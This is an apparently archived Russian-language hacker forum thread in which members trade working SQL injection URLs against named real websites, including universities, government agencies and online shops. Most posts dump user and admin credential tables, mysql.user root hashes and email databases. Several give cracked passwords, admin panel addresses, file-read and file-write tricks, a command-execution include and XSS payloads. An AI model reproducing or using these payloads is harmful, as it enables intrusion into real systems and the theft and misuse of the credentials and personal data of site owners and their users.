http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

мертвая скуля...
в каком плане мертвая? вроде выводит все
http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(), 0x71),0x71),3,4,5,6,7,8,9,10,11,12,13/*

в каком плане мертвая? вроде выводит все
http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(), 0x71),0x71),3,4,5,6,7,8,9,10,11,12,13/*
я там ни одной таблицы не нашел...

Вернусь к нашим "баранам"
Shados. Я сильно подозреваю что полезная инфа береться из таблицы users, она там есть http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 +from+INFORMATION_SCHEMA.TABLES+limit+28,28/*
Но вот при запросе к ней ругаеться что нет такой таблицы=\
Щас еще посмотрю

Вернусь к нашим "баранам"
Shados. Я сильно подозреваю что полезная инфа береться из таблицы users, она там есть
Но вот при запросе к ней ругаеться что нет такой таблицы=\
Щас еще посмотрюпросто база другая
http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,5,concat(username,char(58), password),7,8,9,10,11,12+from+shoutout_marycoughla n_db.users/*
2maxster
как вариант можно предложить активную xss в поле ника, создаешь фотку и в поле ника пишешь код.
пример:http://z04.kazantipa.net/index.php?m0=8&m1=1

http://www.sinotruck.ru/index.php?t=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8,9,10,11,12,13,14, 15,16,17/*

http://www.musagetes.kz/konkurs/text_more.php?cid=5&tid=-1+union+select+1,2,3,concat(user(),char(58),versio n()),5,6,7/*

www.npstoik.ru


«Современные Технологии
в Образовании и Культуре» :
http://www.npstoik.ru/vio/inside.php?ind=news2&key_news=-87+union+select+1,AES_DECRYPT(AES_ENCRYPT(version( ),0x71),0x71),3,4,5/*

www.prom.kz (Каталог предприятий)
http://www.prom.kz/modules/articles/article.php?id=-3+union+select+1,2,3,4,5,6,concat(name,0x3a,pass), 8,9,10,11,12,13,14,15,16,17,18,19,20+from+bx_prom_ user+limit+2,1/*
http://www.prom.kz/modules/articles/article.php?id=-3+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12 ,13,14,15,16,17,18,19,20+from+INFORMATION_SCHEMA.T ABLES+limit+34,1/*

http://lotok.com.ua
интернет-аукцион
таблицы: (99 шт.)
http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+table_name+from+information_schema .tables+limit+36,1/*
таблица юзеров #1
http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(login,0x3a,password,0x3a,em ail)+from+ppusers+limit+0,1/*
#2http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(username,0x3a,password)+fro m+probid_users/*
админ:
http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(username,0x3a,password)+fro m+probid_admins/*
все пароли в MD5, пока не расшифровал)
Аукцион мб не особо крупный, но инфы в таблицах очень много.

Вот собсна.. раскручена полностью. думаю вполне даже паблик)

http://www.popecenter.org/clarion_call/article.html?id=-1806+union+select+1,2,3,4,user,6,password,8,9,10,1 1,12,13,14,15,16,17,18,19+from+mysql.user/*

так же есть таблица users
http://www.popecenter.org/clarion_call/article.html?id=-1806+union+select+1,2,3,4,concat_ws(char(58),datab ase(),user(),version()),6,7,8,9,10,11,12,13,14,15, 16,17,18,19+from+users/*

Центр маркетингово-аналитических исследований
http://www.cmar.kz/index.php?id=15&PageLevelID=-154+union+select+user+from+mysql.user
таблица (password) есть но не выводится(:
http://www.women.unesco.kz/base.php?id=-4+union+select+concat(login,0x3a,pwd)+from+users+l imit+4,1/*
пассы в чистом виде

Tut.by
Огроменный портал...

http://catalog.tut.by/list.phtml?form[catid]=8+union+select+1,2,3,4,5,6,7,8,9,10/*

Очевидно, юзеры в другой БД, имя которой я пока не угадал =(

___________

Таблиц не подобрал.

http://www.extremeua.com/index.php?lang=rus&c=4&base=RockArea&id=3+union+select+1,2,3,4,5,6,7

http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,concat(user,char(58),password)%20from%20m ysql.user/*
устал подберать количество столбцов . . .

http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,concat(database(),char(58 ),user(),char(58),version()),7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34/*
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34+from+information_schema.tables+li mit+16,1/*
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34+from+information_schema.tables+li mit+168,1/*

http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,concat(user,char(58),password)%20from%20m ysql.user/*
устал подберать количество столбцов . . .
Зато мы подобрали. Ты немного переборщил. Вот как надо:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,n ull,null,null,password,user,null,null,null,null,nu ll,null,null,null,null,null,null,null%20from%20mys ql.user%20limit+0,1+INTO+OUTFILE+'test'/*

http://www.ipsnotizie.it/nota.php?idnews=-619+union+select+1,2,concat(database(),char(58),us er(),char(58),version())/*

Web studio... Блин, свой сайт до ума не доведут, но под заказ от 200 у.е. - пожалуйста...
К mysql.user доступ закрыт, но мож кто-то таблиц найдет каких =)

http://www.mg-portal.com.ua/index.php?st=0&lang=0&id=50+union+select+1,2,3,concat(version(),char(58) ,char(58),char(58),user()),5

Зато мы подобрали. Ты немного переборщил. Вот как надо:
http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,n ull,null,null,password,user,null,null,null,null,nu ll,null,null,null,null,null,null,null%20from%20mys ql.user%20limit+0,1+INTO+OUTFILE+'test'/*ты все перепутал запись в файл делается так
select+1,2,3,4,5,'тут данные которые будут записаны в файл'+from+mysql.user+into+outfile+'а тут папка куда записать'/*

www.radiobras.gov.br

Уже и бразилия =\

http://www.radiobras.gov.br/materia_i_2004.php?materia=-258494+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AE S_ENCRYPT(password,0x71),0x71),10,11,12,13,14+from +mysql.user/*

кажись так :

root:6578c02369b5e3a9

http://personal.in.ua/article.php?ida=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13/*
http://www.vechirka.kiev.ua/article.php?id_article=-1+union+select+1,user(),3,4/*&cy=&cm=

http://personal.in.ua/article.php?ida=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13/*
http://www.vechirka.kiev.ua/article.php?id_article=-1+union+select+1,user(),3,4/*&cy=&cm=
http://www.vechirka.kiev.ua/article.php?id_article=-1+union+select+1,concat(login,char(58),pwd),3,4+fr om+admins/*&cy=&cm=а вот и админский акк ;) /me пока ее ищет:)

Что - то мне подсказывает, что юзерорв тут ооочень много... Может потому что это 10-й по счету результат в гугле на запрос "Логин : "? =) Все дружно ищем таблицу с акками...

http://www.russianewswire.ru/releases_headlines_details.php?id=9929000+union+se lect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,5 2,53,54,55,56

http://www.crenos.it/news/singnews.php?idnews=-28+union+select+1,password,2,3,4,5,6,7,8,9+from+my sql.user/*
universities(универ какой-то)
http://www.karat-telecom.ru/News/vnews/pnews.php?idnews=-113+union+select+
пипец приехали . . .

Официальный сайт игры "Самый умный" :)

http://sumclub.tv/user.php?id=321&op=photolist&photo=-154%20union%20select%201,2,3,4,concat(id,char(58), name,char(58),passwd),6%20from%20users%20limit%201 6000,1/*
http://sumclub.tv/user.php?id=321&op=photolist&photo=-154%20union%20select%201,2,3,4,concat(name,char(58 ),login,char(58),password),6%20from%20admins/*
16k юзеров, У админов открыты пароли.

http://www.ludolega.it/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,concat( user(),0x3a,database(),0x3a,version()),6,7/*

http://wnro.kiev.ua/index.php?catns=kb&view=items_view&group=4&id=-2297+union+select+1/*


сил перебирать колонки не хватило, если кто переберет отпишитесь в ЛС, плз

2maxster
http://wnro.kiev.ua/index.php?catns=kb&view=monsters_view&id=-1002%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57%20from%20ite m_db/*

http://wnro.kiev.ua/index.php?catns=kb&view=items_view&group=4&id=-2297+union+select+1/*


сил перебирать колонки не хватило, если кто переберет отпишитесь в ЛС, плз

Мне сказать an-ky и KarLaed'e что на серваке завелся хацкер ?

скажи что у них там дырка, а хацкер устал

Очень интересный скуль. За все свое время 1 раз подобное встретил. Скуль в инклуде


http://www.ludolega.it/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,concat( username,char(58),user_password),6,7+from+forumLLL _users+limit+1,1/*


Iubatus:7d34d0d984f5803aecd4519d6b72145aи нах спрашиваеться теперь морочиться с акк админа :D

http://www.carmedia.org/carmedia/accueil.php?idnews=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34/*
http://www.nero.com/eng/showpress.php?id=-1187+union+select+1,2,3/*

тишина . . . . . .

http://www.tarquinbooks.com/default.asp?Categoryid=1+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35/*
глухарь=\

2KPOT_f!nd
http://www.carmedia.org/carmedia/accueil.php?idnews=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16/* колонок всего 16, таблиц чето не нашел, надо форум смотреть.

http://zonewm.biz/showasf.php?id=-4+union+select+1,2,3,4,5,6,7,8,9/*
http://www.businessandemployment.biz/news/news.php?id=-200+union+select+1,2,3,4,5,6,7+from+phpcms_news/*

KPOT_f!nd
-> http://zonewm.biz/showasf.php?id=-4+union+select+1,2,3,4,5,6,7,8,9/*


Админка: http://zonewm.biz/admin/
___zonewm.biz/showasf.php?id=-4+union+select+1,id,3,mail,5,pass,7,8,9+from+user/*

-= tables =-

user
sites
stat
news
gb

http://www.arabmonitor.info/news/dettaglio.php?idnews=-17989+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from +NEWS/*
http://www.pechka.biz/main.php?id=-1+union+select+1,2,3,4,5,6/*
http://www.togather.biz/showcg.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
http://www.insideout.biz/article.php?id=-70+union+select+1,2,password,4+from+mysql.user/*

немного в зоне biz

http://www.allaboutjazz.com/php/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,concat(em ail,0x3a,pswd),5,6,7,8,USER(),0,1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9, 0+from+person+limit+696,1/*

такую таблицу еще не встречал

http://dukemednews.duke.edu/news/article.php?id=-6422+union+select+1,2,3,4,user,password,7,8+from+m ysql.user/*
root:623460e26f081bbc

http://llk.media.mit.edu/projects.php?id=-783+union+select+1,2,3,user,password,6,7,8+from+my sql.user+limit+30/*
http://llk.media.mit.edu/projects.php?id=-783+union+select+1,2,3,4,5,6,7,8/*
http://llk.media.mit.edu/projects.php?id=-783+union+select+1,2,3,4,5,6,7,8,9,10/*
root:1c3b7f0b58c961df

http://www2.ric.edu/news/displayNews.php?id=news-359+union+select+1,2,user,4,password,6+from+mysql. user/*
root:admkrubino

http://www.bridgewater.edu/index.php?id=-856+union+select+1,2,3/*
http://blogsforlearning.msu.edu/articles/view.php?id=-6+union+select+1,2,3,4,5,6,7,8,9/*
http://studyabroad.arizona.edu/display_program.php?id=-171+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32/*
http://dma.ucla.edu/gallery/faculty_gallery.php?ID=-101+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
http://olin.msu.edu/factsheet.php?ID=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32/*
http://www.ee.virginia.edu/profile.php?ID=-42+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*




http://math.smsu.edu/~erik/software.php?id=7'
http://kmoddl.library.cornell.edu/resources.php?id=105'
немного домены в зоне EDU

http://bs-stat.com.ua/article.php?article=-75+order+by+3/*
http://maximum.in.ua/view.php?page=info&record=8091'
http://www.19rus.info/news.php?news_id=15945' (PostgreSQL)

2KPOT_f!nd
http://math.smsu.edu/~erik/software.php?id=-1+union+select+null,TABLE_NAME+from+INFORMATION_SC HEMA.TABLES--


http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-1+union+select+1,2/*
http://www.michaelpollan.com/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0/*

какие-то беспонтовые(

KPOT_f!nd, _ttp://dukemednews.duke.edu уже было :)
VampiRUS, _ttp://www.linspire.com было :)

Zebra telecom
http://www.zebra.ru/private/i/logo.gif
=========
zebra.ru
=========
http://www.zebra.ru/private/newsall.php?prn=-5+union+select+concat(user(),char(59),database())/*

http://www.medroom.ru/show_cat2.php?grid=-1+union+select+1/*
мдааа

http://www.medroom.ru/show_cat2.php?grid=-1+union+select+version()/*

http://www.digitalcitiesproject.net/arts/show.php?pid=-32+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19/*
http://www.lotinfo.com/index.php?page=news&id=-28+union+select+1,database(),version(),4,5/*

zonewm.biz
http://zonewm.biz/showasf.php?id=-4+union+select+1,2,3,concat(pass,0x3a,mail,0x3a,id ),5,6,7,8,9+from+user/*
http://kvint.biz/index.php?id=-14+union+select+1,user()/*

ВНИМАНИЯ

offtop:

По причинам накручевания репутации через тему SQL Инъекции , всем активным участникам этой темы было поставлено минус в виде - Участие в цепочке по накрутке репы через тему " SQL Инъекции "! Призываю вас братья, остановитесь! Хватит накручивать себе репу, нас зовут наркоманами, мы не кто. Мы не хотим в МОА, потому что нас там не ждут. Но мы боримся и будем выживать на этом поле сражения, нам наплевать на ваши предупреждения в виде "минуса", потому что не репутация нас волнует, а тот ФАКТ что нам интересно ИСКАТЬ УЯЗВИМОСТИ СПОСОБОМ SQL INJ и ДЕЛИТЬСЯ ЗНАНИЯМИ С ДРУГИМИ!

http://www.medsait.ru/show_cat2.php?grid=-1+union+select+1/*

http://www.medsait.ru/show_cat2.php?grid=-1+union+select+user()/*

неужели валуехост всем так нравиться)

2alextoun

http://www.medsait.ru/show_cat2.php?grid=-1+union+select+concat(username,0x3a,passwd)+from+u ser+limit+1,1/*
Прогоняя через лимит просматриваем юзеров.
Админка:
http://www.medsait.ru/admin/

<input type=text size=15 name=username class=submit3>

<input type=password size=15 name=passwd class=submit3>

Прогоняя через лимит просматриваем юзеров.
Админка:
http://www.medsait.ru/admin/
блин всё время забываю админку найти...

http://www.rusins.ru/ru/index.php?newid=-300+union+select+concat(version(),char(58),user())/*
=\

http://youworkforthem.com/list.php?cat=-9+union+select+1,convert(version()+using+latin1),3 ,4,5,6,7,8,9+from+users
0_o Ты Работаеш На Них! =)

http://www.togather.biz/showcg.php?id=-4+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(datab ase(),0x71),0x71),5,6,7,8,9,10,11/*

http://www.fight.org/subsection.php?cat=-10+union+select+1,version(),3,4,5,6,7,8/*&sec=29&sub=7
когда будете пробиваться дальше, не убирайте переменные после начала комментария, на сайте видимо стоит какой то скрипт, который проверяет правильность строки, если убрать не нужные переменные - выкидывает на индекс =\

Спамерам база мыл
http://www.timegifts.ru/index.php?description=-1'+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(e mail_user,0x3a,password),0x75),0x75)+from+us

http://www.dirtragmag.com/web/news-article.php?ID=-99)+union+select+1,2,3,4,5,6,7,8,version(),10,11,1 2,13/*
Скобку после -99 тоже не убираем =)

http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8,9,10,11,12,13,14, 15/*
http://www.democracy.ru/print.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15+from+information_schema.tables+limit+242 ,1/*

http://www.democracy.ru/print.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15+from+information_schema.tables+limit+25, 1/*
http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat(table_schema,char(58),co lumn_name),4,5,6,7,8,9,10,11,12,13,14,15+from+info rmation_schema.columns+where+table_name=char(99,10 8,105,101,110,116,115)+limit+0,1/*
http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat(clientID,char(58),client name,char(58),contact,char(58),email,char(58),view s,char(58),clicks,char(58),clientusername,char(58) ,clientpassword,char(58),expire),4,5,6,7,8,9,10,11 ,12,13,14,15+from+iesd.clients+limit+0,1/*

http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat(username,char(58),user_p assword),4,5,6,7,8,9,10,11,12,13,14,15+from+iesd.p hpbb_users+limit+1,1/*

http://www.maxwaugh.com/store/details.php?iid=-30+union+select+1,2,3,4,5,6,7,8,9,version(),11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30
=))))

Спамерам база мыл
http://www.timegifts.ru/index.php?description=-1'+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(e mail_user,0x3a,password),0x75),0x75)+from+us
я это выкладывал страниц 20 назад

я это выкладывал страниц 20 назад
0_о
***** >www.timegifts.ru Не хо покопаться,там говорят скуль есть
bxN5 > Могу ,а нах*й тебе?
*****> Там говорят база мыл хорошая
Не видел,мне вообще эта ветка не нравится

0_о
***** >www.timegifts.ru Не хо покопаться,там говорят скуль есть
bxN5 > Могу ,а нах*й тебе?
*****> Там говорят база мыл хорошая
Не видел,мне вообще эта ветка не нравится

было, было) у меня база на харде)

ps: piro.ru шоп
http://www.piro.ru/show_katalog.php?id=-1+union+select+1,2,concat(login,0x3a,password)+fro m+users/*
мб было, не помню..
база логины:пассы в откр. виде

http://astoriarealty.ru/pages/page.php?page=-1+union+select+1,DATABASE(),3,4,5,6,7,8,9,10,11/*

не могу ниче подобрать

2edos
аффигительная скуля))

http://astoriarealty.ru/pages/page.php?page=-1+union+select+1,1,1,0x706870696E666F28293B,1,1,1, 1,1,1,1/*
http://astoriarealty.ru/pages/page.php?page=-1+union+select+1,1,1,0x6563686F20606C73202D6C61603 B,1,1,1,%201,1,1,1/*
Даже можно ls -la выполнить.

там и подбирать ничего неандо))

http://politdigest.net.ua/news.php?cat=-12+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/*
может байан
ЗЫ Превед Ксандер =)

VampiRUS, скуля жесть, include() рулит =)

http://www.jerusalemsummit.org/eng/news.php?news=-102+union+select+1,2,3,User(),4,5,version(),7,9,da tabase()/*

http://www.clearone.com/products/product.php?cat=2&prod=-10+union+select+1,2,convert(version()+using+latin1 ),4,5,6,7,8,9,10
SQL - Injection

http://www.4cio.ru/main.php?mname=160&number=-1+union+select+0x3c7363726970743e616c6572742827444 956455227293c2f7363726970743e+from+mysql.user+limi t+0,1/*

http://www.maptun.com/webshop/shop.php?rubrik=25+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,4 3,44,45,46,47,48,49,50,51,52,53,54,5,56,57,58,59,6 0,61,62--


http://www.maptun.com/news.php?id=-104+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23--


http://www.maptun.com/cars.php?id=-57+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,version(),19,database(),TABLE_NAME,22 ,23,24,25,26,27,28,29,30+from+INFORMATION_SCHEMA.T ABLES+limit+32,1-


http://www.afcwimbledon.co.uk/shop/shop.php?deptid=1+and+1--
http://www.afcwimbledon.co.uk/shop/shop.php?subid=2&itemid=951+and+version()%3C4

http://www.frankeksd.com/productcategory.php?cat=2+-2+union+select+convert(version()+using+latin1),2/*
=\
update
http://www.abandonline.com/gameinfo.php?id=-1+union+select+version()

http://www.ibercork.ru/news.php?id=-1+union+select+1,0x3c68313ed8ebffefe020eae0eae0fff 2ee20283c2f68313e,111/*

http://swoonable.indisguise.org/sites.php?cat=-4+union+select+1,%3Cscript%3Ealert(/@_@/)%3C/script%3E,3,4/*
http://swoonable.indisguise.org/sites.php?cat=-4+union+select+1,version(),3,4/*
@_@
update
http://www.stretchboards.com/boards/index.php?cat=2&product=-13+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13/*

http://www.promtractor.ru/products_show.php?section=9&id=75+union+select+1,2,3,4,5,6,7,8,9,0/*

http://www.lesbo.ru/erotexts/list.php?gid=-31+union+select+database()/*

http://www.ghanaweb.com/law_cms/list.php?CAT=-4+union+select+1,2,3,4,5,6,7,concat(database(),0x3 a,version()),9,10,11,12/*

http://www.akimbo.biz/exhibitions/index.php?id=-6593+union+select+1,2,3,concat(password,0x3a,admin ),5,6+from+users/*
http://haytom.us/showarticle.php?id=-19%20UNION%20SELECT%201,user(),3,4,5/*

http://www.tardmo.com/experiences.php?cat=-8+union+select+1,2,null,4,5,version(),7,8/*
@_@
update
http://www.loserheroes.com/collection3.php?cat=-15+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15/*

http://www.gdnet.org/middle.php?oid=-1095+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+m ysql.user/*


:)

http://www.vniiofi.ru/news/news.php?nid=-7+union+select+1,version(),3,4/*

:)

http://www.masterkit.ru/main/set.php?num=-634+union+select+1,2,3,4,5,version(),7,8,9,10,11,1 2,13,14/*

:)

http://expertfootball.com/gossip/answer.php?qid=-370+union+select+1,version(),3,4,5,6,7,8,9,10/*

:)

http://www.ocasi.org/index.php?qid=-895+union+select+1,version()/*

Чего-то сегодня все недоделаные...непродуктивн� �й день :D

motvet.ru

Не плохой мобильный портал =)

http://motvet.ru/aboutgame.php?IDNew=-1038+union+select+1,2,3,4,5,6,concat(user,char(58) ,password),8,9,10+from+mysql.user/*&id=3

root:045a18944aed3d1b

http://www.ueet.nasa.gov/toi/viewtoi.php?id=-1+union+select+1,version(),3,database(),5,6,7,8/*

www.777777.ru
http://www.777777.ru/index.php?link=news&id=-682+union+select+1,concat(user(),char(59),database (),char(59),version()),3/*

motvet.ru

Не плохой мобильный портал =)

http://motvet.ru/aboutgame.php?IDNew=-1038+union+select+1,2,3,4,5,6,concat(user,char(58) ,password),8,9,10+from+mysql.user/*&id=3

root:045a18944aed3d1b

Поставил на расшифровку получил:

root:aqz910

Sokol TV
http://www.sokol-tv.ru/themes/main/images/logo.gif
============
www.sokol-tv.ru
============
http://www.sokol-tv.ru/index.php?id=19&man=2&l=7&it=-77+union+select+1,2,3,version(),concat(user(),char (59),database())/*

http://www.chugworth.com/comic.php?id=-13+union+select+null,version()
limpompo, там скорее всего с локалхоста =\
upd
http://www.viking.tm/product.php?id=-7+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x73),0x73),null,4,5,6,7

http://www.energy.ca.gov/links/base.php?pagetype=-147+union+select+1,concat(user,char(58),password), 3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 ,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,6 9,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85, 86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101, 102,103,104,105,106,107,108,109,110,111,112,113,11 4,115,116,117,118,119,120,121,122,123,124,125,126, 127,128,129,130,131,132,133,134,135,136,137,138,13 9,140,141,142,143,144,145,146,147+from+mysql.user/*
@_@
Грузится около 350 кб. Кому делать нефиг =\

http://www.1mobile.ru/catalogue.php?group_id=1'

Помогите подобрать =) А то денег нет на сотик новый

Можт кто подберет талицу, отпишитесь
http://www.laguna.by/base.php?id=-11+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17/*

http://www.decosp.ru/index.php?idNew=-85+union+select+1,2,3,4,5,concat(user(),char(58),v ersion(),char(58),database()),7/*

d-seller.ru


Интернет супермарккет!

http://d-seller.ru/index.php?page=mobilecontent&mkpage=indexjava.php&IDNew=-1087/**/union/**/select/**/1,concat(user,char(58),password),3,4,5,6,7,8,9,10/**/from/**/mysql.user/*&action=about&id=5&countCurrentPage=&sort=&chosenPhone=_&filterByPhone=

root:045a18944aed3d1b

d-seller.ru


Интернет супермарккет!

http://d-seller.ru/index.php?page=mobilecontent&mkpage=indexjava.php&IDNew=-1087/**/union/**/select/**/1,concat(user,char(58),password),3,4,5,6,7,8,9,10/**/from/**/mysql.user/*&action=about&id=5&countCurrentPage=&sort=&chosenPhone=_&filterByPhone=

root:045a18944aed3d1b

логин: root
пасс: aqz910

===========
Заметил что hash одинаков с

https://forum.antichat.ru/showpost.php?p=334228&postcount=1921
===========

motvet.ru

Не плохой мобильный портал =)

http://motvet.ru/aboutgame.php?IDNew=-1038+union+select+1,2,3,4,5,6,concat(user,char(58) ,password),8,9,10+from+mysql.user/*&id=3

root:045a18944aed3d1b
уже было, юзайте поиск:

http://motvet.ru/aboutgame.php?IDNew=-1+union+select+1,2,3,4,5,6,LOAD_FILE(char(99,58,92 ,119,119,119,92,99,111,110,102,92,104,116,116,112, 100,46,99,111,110,102)),8,9,10/*
// показывает httpd.conf

А в базе интересного всё равно ничего нет, уж поверьте, я точно знаю из надёжных источников ;)

Можт кто подберет талицу, отпишитесь
Подобрал только вот эту (price):
http://www.laguna.by/base.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17+from+price/*
и вот эту (tkan):
http://www.laguna.by/base.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17+from+tkan/*
боюсь, там мало интересного =/

http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+user(),version()/*
http://www.origami.as/gallery.php?gallery=17&image=-304+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
http://www.buhgalteria.com.ua/Answer.html?id=2869+union+select+null,null/*

http://www.buhgalteria.com.ua/Answer.html?id=2869+union+select+null,null/*[/code]
http://www.buhgalteria.com.ua/Hit.html?id=-1+union+select+1,2,3,4,5,6,7,convert(password%20us ing%20cp1251)%20+from+mysql.user/*

http://www.kafanews.com/forum/install/upgrade_301.php?step=SomeWord

http://www.kafanews.com/?link=1&nn=-1'l

2Doom123
http://www.kafanews.com/?link=1&nn=-3%20union%20select%201,table_name,3,4,5,6,7,8,9,0, 11,12,13%20from%20information_schema.tables limit 16,2/*

http://www.kafanews.com/?link=1&nn=-3%20union%20select%201,concat_ws(char(58),id,name, email,icq,pass),3,4,5,6,7,8,9,0,11,12,13%20from%20 users/*

http://www.kafanews.com/?link=1&nn=-3%20union%20select%201,concat_ws(char(58),id,name, mail,pass),3,4,5,6,7,8,9,0,11,12,13%20from%20user/*

http://www.bookzone.com.ua/catalog.php?bid=-18281+union+select+null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null+from+i nformation_schema.tables

PostgreSQL :)

http://www.evotools.ru/item.php?product=-145+union+select+1,2,3,user(),5,6,7,1,1,1,1/*
http://www.constantag.ru/index.php?id=-1+union+select+1,1,1111111111111111111111111111111 1111111/*
http://www.sokol-tv.ru/index.php?id=4&article=-1+union+select+1,2,3,'SHNIAGA',5,1,1,1,1,1,1,1/*
http://t-avia.ru/index.php?m=-1+union+select+11,22,3,4,5,6,7,8,9+from+users+limi t+0,1/*<---Магазин
http://www.en.lv/index.php?m=-1+union+select+2007+from+mysql.user/*Вывод в <title>

http://photo.dive.kz/photo.php?id=-784+union+select+1,2,3,concat(database(),0x3a,vers ion(),0x3a,user()),5,6/*

http://www.women.unesco.kz/base.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

Женщины и Культура в Центральной Азии :: База

Сайт нашей элиты =))) Green.ru
